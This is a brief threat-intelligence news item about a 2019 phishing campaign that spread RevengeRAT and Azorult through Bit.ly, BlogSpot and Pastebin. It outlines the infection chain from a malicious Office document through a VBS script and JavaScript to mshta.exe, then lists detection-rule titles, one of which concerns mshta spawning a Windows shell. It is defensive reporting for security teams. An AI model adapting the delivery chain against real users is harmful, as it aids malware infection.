Pastebin, BlogSpot, and Bit.ly Used to Spread RevengeRAT and Azorult, Again

Delaware, USA – October 3, 2019 – The campaign lasted at least until the end of September, and researchers associate it with the activities of the Gorgon group. The Prevailion team found a financially motivated campaign, which began last year and uses legitimate resources to infect victims with Azorult or RevengeRAT malware, and for command-and-control communications to hide malicious activity from traffic analysis solutions. Researchers called campaign MasterMana Botnet and liken it to a large-scale campaign distributing RevengeRAT malware conducted in March 2019. According to the analysis of tactics, techniques, and procedures, the main suspect in these campaigns is the Pakistani threat actor ‘Gorgon Group‘. Attackers send phishing emails with malicious MS Office documents to corporate emails. The document contains a VBS script that reaches out to a Bit.ly link retrieving and decoding javascript from attackers’ Blogspot. The downloaded script launches mshta.exe to open a next-stage payload hosted on Pastebin.

Over the ten months of the campaign, attackers repeatedly changed not only Pastebin, BlogSpot, and Bit.ly links, but also malware delivered: in part of the attacks they infected victims with Azorult malware instead of RevengeRAT. Azorult can be used to deliver various tools and other malware, including ransomware.
Content to uncover this attack available on Threat Detection Marketplace:
MSHTA Spawning Windows Shell – https://tdm.socprime.com/tdm/info/2175/
Possible Malicious Use of MSHTA.EXE Detector (Sysmon Behavior) – https://tdm.socprime.com/tdm/info/2403/
MSHTA spwaned by SVCHOST as seen in LethalHTA (Sysmon). – https://tdm.socprime.com/tdm/info/1065/
AZORult malware detected – https://tdm.socprime.com/tdm/info/2203/